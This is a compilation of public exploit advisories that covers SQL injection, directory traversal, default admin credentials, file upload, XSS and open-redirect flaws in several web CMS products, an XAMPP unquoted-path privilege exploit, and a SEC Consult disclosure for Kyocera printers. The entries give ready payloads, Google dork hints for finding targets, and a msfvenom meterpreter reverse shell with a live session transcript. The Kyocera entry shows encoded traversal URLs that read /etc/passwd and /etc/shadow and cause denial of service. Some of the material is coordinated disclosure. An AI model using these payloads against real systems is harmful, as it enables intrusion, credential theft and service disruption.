<pre><code>====================================================================================================================================<br />| # Title : Nedal CMS 1.2 SQL injection vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.sanapix.com/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine .<br /><br />[+] use payload : link.asp?id=6 <br /><br />[+] http://target_site/new/banner/link.asp?id=6 (inject here)<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>=================================================================================================<br />| # Title : Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Dork : طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس) ویرایش 3.4.6 |<br />=================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine .<br /><br />[+] use payload : /downloadfile.php?file=../../../../../../../../../../etc/passwd<br /><br />[+] http://127.0.0.1/itjdconfir/fa/downloadfile.php?file=../../../../../../../../../../etc/passwd<br /><br /><br />====Greetings to :===================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=====================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ARTISTRY LIMITED LMS v 0.5 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.artistrybd.net/ | <br />| # Dork : "Developed By ARTISTRY LIMITED" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine .<br /><br />[+] Appears to leave a default administrative account in place post installation.<br /><br />[+] Use Payload : user & pass = admin<br /><br />[+] https://127.0.0.1/mother-earthnet/apanel/admin/index.php<br /><br /> <br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Architect - HTML and Site Builder V 2.2.3 Remote File Upload vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla Firefox 114.0.1 (64 bits) | <br />| # Vendor : https://codecanyon.net/item/architect-html-and-site-builder/9957269 | <br />| # Dork : "Our award-winning templates are the most beautiful way to present your ideas online." |<br />====================================================================================================================================<br /><br />[+] P0C : <br /><br />[+] The script is based on the Laravel framework, so you can apply the framework's vulnerability to it<br /><br /> https://dl.packetstormsecurity.net/2301-exploits/laravel9470-disclose.txt<br /> <br />[-] XSS via file upload :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Register as a member of the target site .<br /><br />[+] After registering, log in and go to /account/settings .<br /><br />[+] path : https://builder.vebto.com/storage/avatars/9SCDIW0ntFJYqaP9IfrOqhJfzNoyukqmbEOtJxH8.svg <br /><br />[-] Unrestricted File Upload :<br /><br />[+] Go to ( Dashboard/Projects/New) to create a new project or Choose a template for your project .<br /><br />[+] Choose Edit Image and upload your malicious file .<br /><br />[+] path : https://builder.vebto.com/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/ogSIFm8ztsQv4BBEy9Ci96utafSBsu45oe1RhL3y.htm<br /><br /> https://builder.vebto.com/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/kNHGCajolk2LcxsEZq8Q5sGn9p7Pt7gO5nOO1zwz.txt<br /><br /> https://builder.vebto.com/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/50otMfIHgIlJz3OFyuBMjeOSKaXs9a49YLZuaMlK.jpg<br /> <br /> 
https://spiritbuilder.app/storage/projects/26/7u3ps1joxTO0o1e3jZYfvb3klddh3GFzS1dh/images/kc4FLhcYIWBq7AhOHTpxWwjPxwKRe4vX8nmLBahh.php<br /><br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ArabInfotech L.L.C CMS v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://reliancerecruiters.com | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine <br /><br />[+] Use payload : /contactus.php?msg=Thank%2520you%2520for%2520your%2520e-mail.%2520We%2520will%2520get%2520back%2520to%2520you%2520soon'%22()%26%25<acx><ScRiPt%20>prompt(/cxsecutiry/)</ScRiPt><br /><br />[+] http://127.0.0.1/reliancerecruiterscom/contactus.php?msg=Thank%2520you%2520for%2520your%2520e-mail.%2520We%2520will%2520get%2520back%2520to%2520you%2520soon%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/cxsecurity/)%3C/ScRiPt%3E<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: XAMPP 8.2.4 - Unquoted Path<br /># Date: 07/2023<br /># Exploit Author: Andrey Stoykov<br /># Version: 8.2.4<br /># Software Link:<br />https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe<br /># Tested on: Windows Server 2022<br /># Blog: http://msecureltd.blogspot.com/<br /><br /><br />Steps to Exploit:<br /><br />1. Search for unquoted paths<br />2. Generate meterpreter shell<br />3. Copy shell to XAMPP directory replacing "mysql.exe"<br />4. Exploit by double clicking on shell<br /><br /><br />C:\Users\astoykov>wmic service get name,displayname,pathname,startmode<br />|findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />mysql<br /> mysql<br />C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini<br />mysql Auto<br /><br /><br /><br />// Generate shell<br />msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444<br />-f exe -o mysql.exe<br /><br /><br />// Setup listener<br />msf6 > use exploit/multi/handler<br />msf6 exploit(multi/handler) > set lhost 192.168.1.13<br />msf6 exploit(multi/handler) > set lport 4443<br />msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp<br />msf6 exploit(multi/handler) > run<br /><br /><br />msf6 exploit(multi/handler) > run<br /><br />[*] Started reverse TCP handler on 192.168.1.13:4443<br />[*] Sending stage (175686 bytes) to 192.168.1.11<br />[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686)<br />at 2023-07-08 03:59:40 -0700<br /><br /><br />meterpreter > getuid<br />Server username: WIN-5PT4K404NLO\astoykov<br />meterpreter > getpid<br />Current pid: 4724<br />meterpreter > shell<br />Process 5884 created.<br />Channel 1 created.<br />Microsoft Windows [Version 10.0.20348.1]<br />(c) Microsoft Corporation. 
All rights reserved.<br />[...]<br />C:\xampp\mysql\bin>dir<br />dir<br /> Volume in drive C has no label.<br /> Volume Serial Number is 80B5-B405<br /><br /> Directory of C:\xampp\mysql\bin<br />[...]<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : http://articart-demo.livelyworks.net/ │<br />│ Vendor : livelyworks │<br />│ Software : Articart 2.0.1 │<br />│ Vuln Type: Reflected XSS - Open Redirect using base64 Encoding │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL , MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## RXSS<br /><br />Path: /items/search<br /><br />GET 'search_term' parameter is vulnerable to RXSS<br /><br />https://website/items/search?search_term=123zr77l%22%3e%3cscript%3ealert(1)%3c%2fscript%3esadj4<br /><br /><br /><br />## Open Redirect<br /><br />An attacker can use it to redirect a victim to an arbitrary website. This is a powerful tool in<br />phishing campaigns, as it allows hiding the malicious webpage behind a link.<br /><br /><br />Path: /change-language/de_DE<br /><br />GET 'redirectTo' parameter is vulnerable to Open Redirect using base64 encoding<br /><br />https://website/change-language/de_DE?redirectTo=aHR0cHM6Ly93d3cuZXZpbC5jb20v<br /><br />aHR0cHM6Ly93d3cuZXZpbC5jb20v = https://www.evil.com/<br /><br /><br /><br />[-] Done<br /></code></pre>
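A base64-encoded redirect parameter such as the redirectTo value above is still attacker-controlled once decoded; the encoding only hides the destination from a casual reader. The Python below is an added example, not code from Articart or livelyworks: it decodes the parameter the way the application would have to, then accepts only a same-site path or an https URL whose host is on an explicit allow list, and sends everything else to a fixed landing page. The allow-list host is the advisory's demo hostname, used purely as an illustrative value.

```python
"""Added example: validating a base64-encoded redirect target."""
import base64
import binascii
from urllib.parse import urlsplit

DEFAULT_LANDING = "/"  # where the app sends users when the target is refused


def encode_redirect(target: str) -> str:
    """Encode a target the way the application would put it on the URL."""
    return base64.urlsafe_b64encode(target.encode("utf-8")).decode("ascii").rstrip("=")


def decode_redirect_param(value: str):
    """Decode the redirectTo value; None if it is not valid base64 / UTF-8."""
    padded = value + "=" * (-len(value) % 4)
    try:
        # Strict standard alphabet first, then the URL-safe alphabet.
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        pass
    try:
        return base64.urlsafe_b64decode(padded).decode("utf-8")
    except (binascii.Error, ValueError):
        return None


def looks_malformed(target: str) -> bool:
    """Reject empty targets, control characters, whitespace and backslashes.

    Browsers treat "\\" like "/" and some URL parsers strip leading control
    characters, so such a target may be parsed differently by urlsplit than
    by the user's browser; refusing it avoids the parser differential.
    """
    if not target or "\\" in target:
        return True
    return any(c.isspace() or ord(c) < 0x20 or ord(c) == 0x7F for c in target)


def split_or_none(target: str):
    """urlsplit raises ValueError on some malformed input (e.g. bad IPv6)."""
    try:
        return urlsplit(target)
    except ValueError:
        return None


def is_local_redirect(target: str) -> bool:
    """True for a same-site path: exactly one leading '/', no scheme, no host."""
    if looks_malformed(target) or not target.startswith("/") or target.startswith("//"):
        return False
    parts = split_or_none(target)
    return parts is not None and parts.scheme == "" and parts.netloc == ""


def safe_redirect_target(param: str, allowed_hosts=()) -> str:
    """Return the URL the application may redirect to.

    The decoded value is used only if it is a local path or an https URL
    whose host is explicitly allowed; anything else falls back to
    DEFAULT_LANDING so the parameter cannot pick the destination.
    """
    target = decode_redirect_param(param)
    if target is None or looks_malformed(target):
        return DEFAULT_LANDING
    if is_local_redirect(target):
        return target
    parts = split_or_none(target)
    if parts is not None and parts.scheme == "https" and parts.hostname in allowed_hosts:
        return target
    return DEFAULT_LANDING


if __name__ == "__main__":
    # The value quoted in the advisory decodes to https://www.evil.com/ and is refused.
    print(safe_redirect_target("aHR0cHM6Ly93d3cuZXZpbC5jb20v"))
    print(safe_redirect_target(encode_redirect("/items/search?search_term=shoes")))
```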
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230705-0 ><br />=======================================================================<br /> title: Path traversal bypass & Denial of service<br /> product: Kyocera TASKalfa 4053ci printer<br /> vulnerable version: TASKalfa 4053ci Version <= 2VG_S000.002.561<br /> fixed version: 2VG_S000.002.574<br /> CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261<br /> impact: High<br /> homepage: https://global.kyocera.com<br /> found: 2022-12-13<br /> by: Stefan Michlits (Office Vienna)<br /> Gorazd Jank (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Kyocera Document Solutions is leading the digital shift driving productivity<br />and growth in the printing industry. We offer a range of exciting new options<br />that draw on the combined resources of the Kyocera Group."<br /><br />Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends that Kyocera customers install the latest updates.<br /><br />Furthermore, an in-depth security analysis performed by security professionals<br />is highly advised, as the software may be affected by other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Path Traversal - Bypass (CVE-2023-34259)<br />A path traversal vulnerability was found by Hakan Eren ŞAN on 2020-06-06.<br />The previous exploit can be found at: https://www.exploit-db.com/exploits/48561<br />Kyocera has fixed the vulnerability. It was not possible to access arbitrary<br />files using the public exploit. 
However, SEC Consult has found a bypass to<br />exploit this vulnerability again and access arbitrary files. Due to the fact<br />that the web service is running as the user root, it was possible to access all<br />files (e.g. /etc/shadow) on the device.<br /><br />2) Denial-of-Service - Web Interface (CVE-2023-34260)<br />The denial-of-service vulnerability is related to the path traversal<br />vulnerability. Instead of requesting a file, a directory will be requested.<br />Once the request is sent to the web service running on TCP port 443, the web<br />service will become unresponsive and must be restarted.<br /><br />3) User Enumeration (CVE-2023-34261)<br />The login function on the web service running on TCP port 443 is prone to a<br />user enumeration vulnerability. The login function returns different<br />responses depending on whether the username is valid or not.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Path Traversal - Bypass (CVE-2023-34259)<br />Previously, a security researcher discovered an unauthenticated directory<br />traversal vulnerability in the web service running on port 443. The following<br />payload was used to access arbitrary files:<br /><br />https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm<br /><br />This vulnerability is fixed in the current version. It was not possible to<br />access arbitrary files using the above payload. However, the vulnerability was<br />not fixed correctly. SEC Consult identified a bypass to exploit this<br />vulnerability again.<br /><br />Once the ../ sequences are URL encoded, it is possible to bypass the fix<br />and access arbitrary files. 
The following payload can be used to access the<br />file /etc/passwd:<br /><br />https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm<br /><br />The response containing the contents of the file /etc/passwd can be seen<br />in the following paragraph.<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Content-Length: 770<br />Accept-Encoding: identity<br />Server: KM-MFP-http/V0.0.1<br />Content-Type: text/html<br />X-Frame-Options: SAMEORIGIN<br /><br />root:x:0:0:root:/root:/bin/sh<br />daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />bin:x:2:2:bin:/bin:/bin/sh<br />sys:x:3:3:sys:/dev:/bin/sh<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/bin/sh<br />man:x:6:12:man:/var/cache/man:/bin/sh<br />lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />mail:x:8:8:mail:/var/mail:/bin/sh<br />news:x:9:9:news:/var/spool/news:/bin/sh<br />uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />proxy:x:13:13:proxy:/bin:/bin/sh<br />www-data:x:33:33:www-data:/var/www:/bin/sh<br />backup:x:34:34:backup:/var/backups:/bin/sh<br />list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false<br />-------------------------------------------------------------------------------<br /><br />Also, it was possible to access the file /etc/shadow. 
The following payload can<br />be used:<br /><br />https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow%00index.htm<br /><br />The output containing the content of the file /etc/shadow can be seen in<br />the following paragraph.<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Content-Length: 401<br />Accept-Encoding: identity<br />Server: KM-MFP-http/V0.0.1<br />Content-Type: text/html<br />X-Frame-Options: SAMEORIGIN<br /><br />root:$1$tfE2pkl/$O8uDq*************bSH.:11029::::::<br />daemon:*:11029::::::<br />bin:*:11029::::::<br />sys:*:11029::::::<br />sync:*:11029::::::<br />games:*:11029::::::<br />man:*:11029::::::<br />lp:*:11029::::::<br />mail:*:11029::::::<br />news:*:11029::::::<br />uucp:*:11029::::::<br />proxy:*:11029::::::<br />www-data:*:11029::::::<br />backup:*:11029::::::<br />list:*:11029::::::<br />irc:*:11029::::::<br />gnats:*:11029::::::<br />nobody:*:11029::::::<br />sshd:x:11029::::::<br />-------------------------------------------------------------------------------<br />As the web service is running as the user root, it was possible to access the<br />/etc/shadow file, or the file has the wrong permissions set.<br /><br />Based on previous security assessments of Kyocera printers, it is likely that<br />the service is running as the user root.<br /><br /><br />2) Denial-of-Service - Web Interface (CVE-2023-34260)<br />To trigger the DoS attack it is sufficient to navigate to the URL:<br /><br />https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%00index.htm<br /><br />Once the request is sent to the web service, the web service will become<br />unresponsive.<br /><br />This attack is related to the path traversal vulnerability. The difference is<br />that in this case a folder is requested instead of a file. 
Apparently, this<br />leads to an error condition in the web server causing it to be unresponsive for<br />all users. Other applications offering a web interface (e.g., on port 8083)<br />seem to not be affected by the attack.<br /><br /><br />3) User Enumeration (CVE-2023-34261)<br />The user enumeration is located in the login functionality of the web<br />interface. Submitting an existing username will result in a different server<br />response than submitting an incorrect username. This enables attackers to<br />enumerate existing users by submitting potential usernames until a different<br />response is gathered. In this case, it does not matter whether the transmitted<br />password is correct or not. The gathered information could be used to better<br />search for default passwords or custom passwords inside public password<br />leaks.<br />If the username does not exist, the response will return<br />"Login-Benutzername oder Passwort falsch."; on the other hand, if the<br />username exists, the response contains "Sie können sich nicht einloggen."<br /><br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following product has been tested:<br />* Kyocera TASKalfa 4053ci<br /><br />All versions older than "2VG_S000.002.561" are vulnerable according to the vendor.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-02-13: Asking for Kyocera KC-SIRT security contact through Nippon CSIRT<br /> Association; quick response: https://www.nca.gr.jp/member/kc-sirt.html<br /> (it seems only the Japanese website shows the email information)<br />2023-02-14: Contacting Kyocera KC-SIRT through kc-sirt@gp.kyocera.jp<br />2023-03-02: Contacting the vendor again, due to no response.<br />2023-03-06: Vendor response, KDC-PSIRT is responsible, requesting security advisory.<br />2023-03-13: Sending security advisory PGP-encrypted.<br />2023-04-19: Vendor response, vulnerabilities confirmed.<br />2023-05-19: Vendor response, the vulnerabilities were fixed. The patch will be<br /> released on 2023-05-26.<br />2023-05-22: Informing vendor that we will request CVE numbers, asking for<br /> information about affected & fixed version numbers.<br />2023-05-24: Vendor provides version information.<br />2023-06-02: Sending CVE numbers to vendor, asking for link to patch download.<br />2023-06-05: Vendor provides download information.<br />2023-07-05: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provided the following download information:<br /><br />There are two ways to update the firmware of our products.<br />* One is to contact the shop of purchase and update the firmware from a service person.<br />* The other is to use the Firmware Upgrade tool. From the Kyocera Document Solutions<br /> Global website in your country, you can download this tool and the latest firmware.<br /> Then you update the firmware yourself.<br /> See: https://www.kyoceradocumentsolutions.com/download/ and choose "TASKalfa4053ci"<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Michlits, G. Jank / @2023<br /><br /></code></pre>
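The two traversal payloads on this page, the plain ../../ form against downloadfile.php and the percent-encoded %2e%2e%2f form that bypassed Kyocera's first fix (CVE-2023-34259), get through for the same reason: the check runs on the raw request string instead of the decoded, canonicalised path. The following Python is an added example, not code from either advisory or vendor; it contrasts a literal "../" filter with a check that decodes once, refuses NUL bytes and leftover encoding, normalises the path and confirms it resolves to a regular file under a fixed web root, which also refuses the directory request that hung the Kyocera service (CVE-2023-34260). The web root and its files are constructed for the demo.

```python
"""Added example: canonical path checking for a file-serving endpoint."""
import os
import posixpath
import tempfile
from urllib.parse import unquote

# Payloads quoted from the advisories above (scheme and host omitted).
ORIGINAL_PAYLOAD = "wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"
ENCODED_BYPASS = "wlmdeu" + "%2f%2e%2e" * 11 + "%2fetc/passwd%00index.htm"
DIRECTORY_DOS = "wlmdeu" + "%2f%2e%2e" * 11 + "%2fetc%00index.htm"
DOWNLOADFILE_PAYLOAD = "../../../../../../../../../../etc/passwd"


def naive_is_safe(raw_path: str) -> bool:
    """A literal-string filter on the raw request path.

    Assumption: the advisory only shows that the plain payload stopped
    working while the encoded one did; this models a fix of that shape.
    """
    return "../" not in raw_path and "\x00" not in raw_path


def canonical_target(web_root: str, raw_path: str):
    """Return the on-disk file for raw_path, or None if it must be refused.

    Every check runs on the decoded, normalised path, so percent-encoding
    cannot hide a traversal from the containment test.
    """
    decoded = unquote(raw_path)
    # A second layer of encoding (%252e) is refused rather than decoded again.
    if "%" in decoded:
        return None
    # NUL truncation ("%00index.htm") is never legitimate in a URL path.
    if "\x00" in decoded:
        return None
    # Treat backslashes as separators so they cannot smuggle a ".." segment.
    decoded = decoded.replace("\\", "/").lstrip("/")
    # Collapse "." and ".." segments; a traversal above the root keeps a leading "..".
    relative = posixpath.normpath(decoded)
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, relative))
    # Containment: the resolved path must stay strictly inside the root.
    if not candidate.startswith(root + os.sep):
        return None
    # Serving a directory is what hung the Kyocera web service
    # (CVE-2023-34260); only regular files are valid targets.
    if not os.path.isfile(candidate):
        return None
    return candidate


def serve(web_root: str, raw_path: str) -> str:
    """Return the file body, or a refusal status in place of the response."""
    target = canonical_target(web_root, raw_path)
    if target is None:
        return "403 Forbidden"
    with open(target, encoding="utf-8") as fh:
        return fh.read()


def build_demo_root() -> str:
    """Constructed web root: one legitimate page under wlmdeu/."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "wlmdeu"))
    with open(os.path.join(root, "wlmdeu", "index.htm"), "w", encoding="utf-8") as fh:
        fh.write("<html>ok</html>")
    return root


if __name__ == "__main__":
    root = build_demo_root()
    for name, path in [("original", ORIGINAL_PAYLOAD), ("encoded", ENCODED_BYPASS),
                       ("directory", DIRECTORY_DOS), ("downloadfile", DOWNLOADFILE_PAYLOAD),
                       ("legitimate", "wlmdeu/index.htm")]:
        print(f"{name:13} naive_ok={naive_is_safe(path)!s:5} hardened={serve(root, path)}")
```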
<pre><code># Exploit Title: Atlas Business Directory Listing 2.13 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 09/07/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/atlas/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message<br />and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br /><br />Path: /atlas/home/filter_listings<br /><br />GET parameter 'price-range' is vulnerable to XSS<br /><br />https://website/atlas/home/filter_listings?category=family-style&&amenity=good-for-kids&&city=marseille&&price-range=790[XSS]&&video=1&&status=open<br /><br /><br />Path: /atlas/home/search<br /><br />GET parameter 'search_string' is vulnerable to XSS<br /><br />https://website/atlas/home/search?search_string=[XSS]&selected_city_id=&selected_category_id=11<br /><br /><br />Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> <br />XSS Filter Bypass : "><script>alert(1)</script><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Ekushey Project Manager CRM 5.0 - Stored XSS<br /># Exploit Author: CraCkEr<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/ekushey/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br /><br />## Description<br /><br />Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive<br />information, manipulate data, and launch additional attacks.<br /><br /><br /><br />Path: /ekushey/index.php/client/message/message_read/xxxxxxxx[random-msg-hash]<br /><br />POST parameter 'message' is vulnerable to XSS<br /><br /><br />-----------------------------------------------<br />POST /ekushey/index.php/client/message/send_reply/8c8936d3 HTTP/2<br /><br />-----------------------------------------------<br />Content-Disposition: form-data; name="message"<br /><br /><script>alert(1)</script><br />-----------------------------------------------<br /><br /><br /><br />## Steps to Reproduce:<br /><br />1. Login as (Client)<br />2. Go to [Message] on this Path: https://website/ekushey/index.php/client/message<br />3. Select any Person to MSG (Clients or ADMINS)<br />4. Inject your XSS Payload in [Reply Message]<br />5. Send<br /><br />6. XSS Fired on Local Browser<br /><br />7. When ADMIN visits [Dashboard] or any section in the Administration Panel on this Path : https://website/ekushey/index.php/admin/dashboard<br />8. XSS Will Fire and Execute in his Browser<br /><br /><br /><br />[-] Done<br /></code></pre>